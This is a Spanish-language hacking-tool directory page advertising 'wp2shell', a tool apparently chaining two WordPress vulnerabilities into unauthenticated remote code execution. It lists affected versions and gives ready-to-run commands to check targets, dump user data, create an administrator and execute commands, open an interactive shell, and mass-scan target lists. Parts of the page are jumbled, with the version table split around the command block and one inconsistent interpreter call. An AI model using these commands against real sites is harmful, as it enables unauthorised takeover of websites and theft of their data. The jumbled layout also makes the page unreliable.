Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
wp2shell — wp2shell - WordPress RCE y PoC (CVE-2026-63030 + CVE-2026-60137) | Kitploit
Herramientas/GitHubGitHub/johenlastgen-jlg/wp2shell
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubjohenlastgen-jlg/wp2shell

wp2shell

wp2shell - WordPress RCE y PoC (CVE-2026-63030 + CVE-2026-60137)

Ver Repositorio
2111hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

wp2shell - PoC de RCE en WordPress (CVE-2026-63030 + CVE-2026-60137)

Ejecución Remota de Código no autenticada en el núcleo de WordPress

por: JohenLastGen


📌 Resumen

Esta herramienta encadena dos vulnerabilidades críticas de WordPress para lograr RCE no autenticado:

VulnerabilidadCVEDescripción
Confusión de ruta batch RESTCVE-2026-63030Omite validación, introduce payload de SQLi
SQLi en WP_Query author__not_inCVE-2026-60137Inyección de cadena sin procesar → ejecución SQL

Impacto: Atacante no autenticado → crea admin → ejecuta comandos


🎯 Versiones Afectadas

Rango de versiónEstado
WordPress 6.9.0 - 6.9.4✅ VULNERABLE (Cadena RCE completa)

🚀 Inicio Rápido

root@kitploit:~
#options:
  -h, --help show this help message and exit
python3 wp2shell.py --help

# 1. Check if target is vulnerable
python3 wp2shell.py check https://target.com

# 2. Extract data (fingerprint/users)
python3 wp2shell.py read https://target.com --preset fingerprint
python2 wp2shell.py read https://target.com --preset users

# 3. RCE - Create admin & execute command (NO CREDENTIALS NEEDED!)
python3 wp2shell.py shell https://target.com --cmd "id"

# 4. Interactive shell
python3 wp2shell.py shell https://target.com --interactive

# 5. Mass scan multiple targets
python3 wp2shell.py scan targets.txt --threads 50 --prove --json results.json
Descargar herramienta
WordPress 7.0.0 - 7.0.1✅ VULNERABLE (Cadena RCE completa)
WordPress 6.8.0 - 6.8.5⚠️ Solo SQLi (necesita plugin facilitador)
WordPress 6.9.5, 7.0.2+❌ Parcheado